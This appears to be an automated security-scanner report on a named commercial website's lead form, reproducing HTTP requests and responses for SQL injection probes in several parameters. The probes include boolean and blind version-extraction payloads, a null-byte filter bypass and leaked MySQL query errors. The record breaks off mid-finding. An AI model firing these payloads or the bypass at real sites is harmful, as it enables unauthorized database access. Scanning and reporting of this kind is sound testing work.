GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=veooma3b12jgmjg69fc9tanc46; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The button3 parameter appears to be vulnerable to SQL injection attacks. The payloads 20463116'%20or%201%3d1--%20 and 20463116'%20or%201%3d2--%20 were each submitted in the button3 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:43:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The catId parameter appears to be vulnerable to SQL injection attacks. The payloads 52585341'%20or%201%3d1--%20 and 52585341'%20or%201%3d2--%20 were each submitted in the catId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:35:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
<script language="javascript" src="js/dhtmlwindow.js"></script> <script language="javascript" src="js/modal.js"></script> <script type="text/javascript" src="js/application_js.js"></script> <link href="css/styles.css" rel="stylesheet" type="text/css" /> <script> function frmprompt(){ frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0') } function frmprompt02(){ frmwindow=dhtmlmodal.open('frmbox', 'd ...[SNIP]...
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20%00'&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=32153bo0htmv3tkr0r773ln656; path=/ Content-Length: 6950 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20%00''&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:08:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=554co4n7kpidq7d73gga9c5r32; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0kmtq3m9ggi0h26ft8n3577i44; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=69giqsd4ivshsjvi8uq4kobuo7; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The companyname parameter appears to be vulnerable to SQL injection attacks. The payloads 98700742'%20or%201%3d1--%20 and 98700742'%20or%201%3d2--%20 were each submitted in the companyname parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:44:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payloads 27651910'%20or%201%3d1--%20 and 27651910'%20or%201%3d2--%20 were each submitted in the emailaddress parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:44:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=vddj30ek5074dqoq0gn7b86d50; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=86t5bh8184dctno66rvrm49fp7; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:09:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=e8erf21322vum4av9ophls3o76; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
Request 2
GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:09:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=bl945dtqvre17l19r6mg33rk11; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>
The firstname parameter appears to be vulnerable to SQL injection attacks. The payloads 48322919'%20or%201%3d1--%20 and 48322919'%20or%201%3d2--%20 were each submitted in the firstname parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:44:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The iusrc parameter appears to be vulnerable to SQL injection attacks. The payloads 16250414'%20or%201%3d1--%20 and 16250414'%20or%201%3d2--%20 were each submitted in the iusrc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:35:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47459
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
